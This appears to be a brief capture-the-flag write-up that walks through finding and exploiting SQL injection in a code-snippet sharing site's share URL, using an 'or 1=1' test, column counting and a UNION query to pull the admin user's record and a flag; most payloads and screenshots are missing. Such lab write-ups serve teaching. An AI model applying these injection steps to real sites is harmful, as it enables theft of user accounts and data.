Step 1: Register
Register and head over to “Public” and find a public snippet to work with.
Select “Share” and take the resulting snippet URL:
Step 2: Test for SQLi
Append an apostrophe and the snippet will not be found:
Remove the apostrophe and the snippet will be found:
From here, I continued in Firefox with the hackbar tool. I tried a ‘or 1=1’ — payload and the page loaded. I was certain we’re dealing with SQLi.
I added a number of columns (tried 8, then 7 but that didn’t work. 6, however, did):
I hit execute and was given the column names: id, title, code, language, description and username:
Ok now, why did I use ‘x’ after /share/ ? The reason is because it doesn’t exist. If we use it, you’ll see that we still return data but not the data we want because the query hits the valid share string. So, let’s replace it again with x’ or etc etc
The following payload grabbed the data we wanted from the users table and specifically the admin user, before placing it into column 2 and 3. In column 3, we see the flag:
Thanks for reading!
